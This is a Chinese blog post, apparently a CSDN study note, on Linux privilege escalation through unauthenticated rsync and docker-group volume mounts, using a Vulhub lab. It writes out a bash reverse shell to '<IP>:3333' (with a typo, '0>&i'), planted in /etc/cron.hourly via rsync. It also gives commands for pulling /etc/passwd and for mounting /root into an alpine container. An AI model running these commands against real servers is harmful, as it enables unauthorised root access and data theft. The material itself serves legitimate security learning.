Linux提权--Rsync(未授权访问)& Docker 组挂载

最新推荐文章于 2024-07-05 10:33:54 发布
最新推荐文章于 2024-07-05 10:33:54 发布
阅读量705 收藏 6
点赞数 10
分类专栏: # 权限提升 文章标签: 服务器 linux 运维 笔记 docker 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138800003
版权

免责声明:本文仅做技术学习与交流...

目录

Rsync(未授权访问)

介绍:

靶场及过程:

 提权过程: 

Docker 组挂载

原理:

复现:

  利用:  

具体操作:

1-确定是否有docker服务

2-查看用户是否在docker组里面

3-执行命令

Rsync(未授权访问)

介绍:

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

靶场及过程:

Vulhub - Docker-Compose file for vulnerability environment

借助 Linux 默认计划任务调用/etc/cron.hourly,利用 rsync 连接覆盖.

 提权过程: 

 1、创建一个 nc 文件,内容  #!/bin/bash  /bin/bash -i >& /dev/tcp/<IP>/3333 0>&i 

 2、赋予执行权限:  chmod +x nc 

 3、上传文件覆盖定时任务目录下  rsync -av nc rsync://<IP>:873/src/etc/cron.hourly 

 3.1、下载文件  rsync -av rsync://<IP>:873/src/etc/passwd ./  

4、进行 nc 监听相应的端口 

 nc -lvnp 3333 

rsync rsync://IP:PORT/

--src   SRC PATH
rsync rsync://IP:PORT/src
--获取到目录结构--可以下载
#下载定时任务:
rsync rsync://IP:PORT/src/etc/crontab./
cat crontab

Docker 组挂载

原理:

普通用户在 docker 组,利用 docker 服务启动镜像挂载目录 .

从而来访问 root 目录、etc 目录等敏感文件来进行权限提升。

复现:

创建用户归类目录,添加到 docker 组.

useradd -d /home/test -m test
​
  passwd test  
​
usermod -G docker test 
​
 newgrp docker

  利用:  

docker run -v /root:/mnt -it alpine 

主要的作用是:

从 Docker 上面下载 alpine 镜像,然后运行; 

 -v 将容器外部的目录/root 挂载到容器内部/mnt,

-it 参数进入容器 shell。

具体操作:

1-确定是否有docker服务

docker

--工具探针

2-查看用户是否在docker组里面

groups 用户名

3-执行命令

低用户运行命令--->

docker run -v /root:/mnt -it alpine 
#可将root目录换为其他目录.
​​​​​​​id
ls /mnt/
#mnt目录像root的目录了.

​ ​

金灰
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
OSCP-Fail(rsync、fail2ban提权
墨痕诉清风的博客
04-23 549
在这一点上,我发现了一个方法,可以允许我们使用rsync上传文件。考虑到这一点,让我们尝试创建密钥对,看看我们是否可以SSH进入机器。由于fail2ban是以root身份运行的,因此可以让fail2ban基于action. d中的配置运行自定义操作。看到了写入fail2ban的所有action.d文件的能力。为此,将使用netcat使用的rsync枚举。使用rsync,我们可以使用-av -list-only选项列出“fox”共享的内容。使用netcat,我们可以列出rsync托管的当前共享。
docker rsync
administrator10的博客
11-22 806
rsync -rtpog --delete --port 3012 --timeout=900 --inplace /mount_path/ndr_test/ root@10.230.135.105::mount_path/ndr_test --password-file=/etc/rsync.password https://www.cnblogs.com/wangshaowei/p/13228683.html 开启coredump ulimit -c unlimit echo '/tmp/core.%t
docker也能提权??内网学习第6天 rsync授权访问覆盖 sudo(cve-2021-3156)漏洞提权 polkit漏洞利用
helloKittywz的博客
07-05 419
现在我们来说说liunx提权的操作:前面我们说了环境变量,定时任务来进行提权的操作我们先来说说什么是rsyncrsync是数据备份工具,默认是开启的873端口 我们是使用docker下载镜像文件,什么镜像文件是不重要的,然后将root目录挂载到mnt容器中然后我们就可以在mnt目录中看见与root是一样文件了,你在外部看这个目录是空的。在这里面进行相对应的操作。sudoedit -s / 像下面的这样的话就说明是没有漏洞的如果不是这样的就说明是存在这个漏洞的。我们也可以直接看版本来确定有没有漏洞然后我
rsync:一个简单的ssh,crontab rsync服务器客户端Docker映像,可以轻松地在Docker卷中同步数据
02-13
简单的docker rsync 一个简单的ssh,crontab rsync服务器/客户端Docker映像,可以轻松地rsync Docker卷中的数据 示例Docker-compose version: "3.2" services: rsync: image: rsync:dev restart: on-failure environment: - RSYNC_CRONTAB=* * * * * # Time to execute http://crontab.guru - RSYNC_HOST_IP=192.168.0.1 # Host IP - RSYNC_HOST_FOLDER=/home/synced-data/ # Host Folder
docker rsync笔记
administrator10的博客
11-12 533
rsync -azrv -e "ssh -p 2222 root@172.16.201.2" /root/vdbench50406 /root/ rsync -rtpog --delete --port 3012 --timeout=900 --inplace /mount_path/ndr_test/ root@10.230.135.105::mount_path/ndr_test --password-file=/etc/rsync.password rsync -rtpog --delete --p
docker-rsync
03-14
该项目仍在进行中。 同步 使用RSync客户端轻松设置SSH守护程序。 运行服务器 docker run --detach --name rsync --publish 22:22/tcp hetsh/rsync 停止容器 docker stop rsync 创建持久性存储 STORAGE= " /path/to/storage " mkdir -p " $STORAGE " chown -R 1376:1376 " $STORAGE " 1376是运行服务器的用户的数字ID(请参阅Dockerfile)。 用户必须对存储目录具有RW访问权限。 使用其他安装标志启动服务器docker run --mount type=bind,source=/path/to/storage,target=/rsync-data ... 时间 同步时区将在日志中显示正确的时间。 可以使用以下挂载标志
docker-sshd:最小的Alpine Linux Docker映像,已公开sshd并且已安装rsync
05-13
固态硬盘带有sshd并已安装rsync最小Alpine Linux Docker映像。环境选项使用以下环境变量配置容器,或选择在/etc/ssh/sshd_config挂载自定义sshd配置:常规选项SSH_USERS要创建的用户帐户和uid / SSH_USERS列表。 ...
运维技术课程 Linux学习教程 网络文件共享-ssh 共32页.pptx
最新发布
07-25
- **Docker容器化**:简要介绍DockerLinux上的应用。 #### 7. **Linux用户及用户管理** - **用户管理**:包括添加、删除用户等。 - **用户管理**:设置用户权限、分配用户等。 #### 8. **Linux服务与进程...
linux-101-hacks
08-27
Linux是世界上最广泛使用的开源操作系统之一,它为用户提供了强大的命令行工具和丰富的软件生态系统。"Linux 101 Hacks" 提供了初学者到中级用户掌握Linux操作系统的实用技巧和快捷方式。以下是对这个资源中可能涵盖...
Linux 50问面试常问问题
07-08
通过调整文件和目录的权限,确保用户和具有正确的访问级别。 32. 什么是Samba,如何在Linux中配置Samba服务器?答:Samba是一个使Linux和Windows系统能够互相共享资源的软件。在Linux中,配置Samba服务器涉及编辑...
sag_linux_admin_zip_
09-30
Linux系统管理指南》 在IT领域,Linux操作系统以其开源、免费、稳定和高度可定制的特性,成为了服务器和开发环境中的重要选择。本指南针对"SAG Linux Admin"的主题,旨在帮助用户深入理解和掌握Linux系统的管理和...
irsync:通过命令行二进制或docker容器在间隔上进行rsync服务器和物联网构建用于基于拉或推的设备内容管理
02-04
间隔 资料来源: : 命令行实用程序和容器,用于间隔运行 。 rsync,在两个源之间同步(单向)文件, irsync包装并以指定的间隔运行它。 作为基本的命令行实用程序,唯一的要求是 。 作为容器,符合要求的是 。 满足所有要求的docker容器大小仅约5兆。 背景 我在博客上写了一些关于irsync背后动机的背景知识。 演示版 使用的docker-compose命令设置一个快速演示。 该项目包括一个带有简单客户端/服务器设置docker-compose.yaml 。 在此作曲家配置中,将irsync设置为每30秒检查一次服务器(同步完成后。服务器安装./data/source目录,
docker-rsync-cron:允许在两个卷之间调度常规rsyncDocker容器
05-02
docker-rsync-cron 这是一个cronjob docker容器,用于定期使用rsync同步两个docker卷。 该映像基于提供,该映像提供了简单的cron实现。 cron守护程序用于执行rsync ,它将把rsync_src卷的内容复制到rsync_dst卷。 可以通过环境变量配置特定选项。 结帐的与使用名为NFS卷设置容器的〔实施例Netshare 。 使用图像 可以通过环境变量来配置映像,以配置rsync命令设置: RSYNC_CRONTAB :crontab时间条目,默认为每晚午夜 RSYNC_OPTIONS :标志传递给rsync ,默认为--archive --timeout=3600 RSYNC_UID :调用rsync时使用的UID,默认为0 RSYNC_GID :调用rsync时使用的GID,默认为0 该映像定义了两个卷: /rsync_src和
rsync-server:Docker中的rsyncdsshd服务器。 您知道,用于移动文件
05-25
rsync服务器 Docker中的rsyncd / sshd服务器。 您知道,用于移动文件。 快速开始 启动服务器(同时支持sshd和rsyncd ) $ docker run \ --name rsync-server \ # Name it -p 8000:873 \ # rsyncd port -p 9000:22 \ # sshd port -e USERNAME=user \ # rsync username -e PASSWORD=pass \ # rsync/ssh password -v /your/public.key:/root/.ssh/authorized_keys \ # your public key axiom/rsync-server 到互联网警告如果公开服务一定要从更改默认密码pass通过设置环境
docksync:Rsync 文件从你的 macosx 机器到 docker 容器
07-03
同步 将文件从 macosx 机器同步到 docker 容器的工具。 从 macosx 到 docker 主机再到容器共享卷非常慢。 在我们的一个大型应用程序中,通常需要 15 秒的任务在共享卷上需要大约 5 分钟。 这是一个 20 倍的性能损失。 问题不是docker,问题是共享卷很慢。 对于小项目,共享卷是好的,但对于较大的项目,开发速度太慢。 这个工具是一种将文件从 macosx 同步到 docker 容器的技巧。 该工具很有用,直到 macosx 上的共享卷更快。 这个怎么运作 它在运行的容器上安装和设置一个 rsync 服务器。 然后它会监视文件系统上任何更改的文件,并根据需要同步它们。 它使用在您的 Dockerfile 中配置的 WORKDIR 并将在那里 rsync 项目文件。 这仅适用于 ubuntu,因为它使用 apt-get 将 rsync 服务器安装到正在
docker-rssh:SFTP,SCP和RSYNC的受限制安全外壳
05-17
远程SSH 易于使用的受限制的安全外壳,适用于SFTP,SCP和RSYNC。 基于( )。 用法 将用户定义为docker run最后一个参数,每个参数一个用户(语法: user:pass[:e][:[uid][:gid]] )。 如果要让用户使用与主机文件系统相匹配的权限来更改安装的卷,则必须为用户设置自定义UID。 将卷挂载到用户的主文件夹中。 例子 单用户和批量 docker run \ -v /host/share:/home/foo/share \ -p 2222:22 -d bboehmke/rssh \ foo:123:1001 在登录 OpenSSH服务器默认在端口22上运行,在本示例中,我们将容器的端口22转发到主机的端口2222。要使用OpenSSH客户端登录,请运行: sftp -P 2222 foo@<host> , sftp
Docker容器管理】Rsync实现主从文件卷定时同步
人生的尽头是孤独
02-14 1286
由于应用服务器里静态文件数量特别大,所以需要对文件卷进行同步备份。使用Docker + Rsync 目的: 将客户端目录备份到服务端目录中 减小宿主机侵占性 提高文件传输的性能 下面是使用的Rsync通信的方法来定时同步文件夹的
RsyncDocker容器备份
小方的小金库
03-14 1452
关于备份,公司使用的rsync,恰逢Docker容器很火,所以,在享受到docker带来的好处之后,也是为了统一一下,所以rsync我也想用容器。当然了,要想用容器,就得有镜像,一般用的也是官方镜像,好巧不巧官方没有rsync镜像,用别人的吧,感觉又不是很好,没有安全感,索性就自己写了一个。这就涉及到Docker里面Dockerfile了。 那就先从创建镜像开始吧! [root@localhost rsync]# cat Dockerfile FROM centos:7 EXPOSE 873 RUN yu
使用docker配置rsync文件同步
马拉紧
02-21 7865
以下均以Linux系统为例进行说明。 服务器(Server)端 使用docker安装rsync serverdocker pull apnar/rsync-server 启动上述docker映像docker run -d \ --restart always \ -p 2222:22 \ ## 配置ssh端口 -p 9797:873 \ ...
linuxrsync--daemon
07-16
rsync是一个用于文件同步和备份的实用工具,而rsync--daemon是rsync的守护进程模式。通过启动rsync守护进程,可以在Linux系统上运行rsync服务,允许其他计算机通过网络连接并与之通信。 要在Linux上启动rsync守护...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值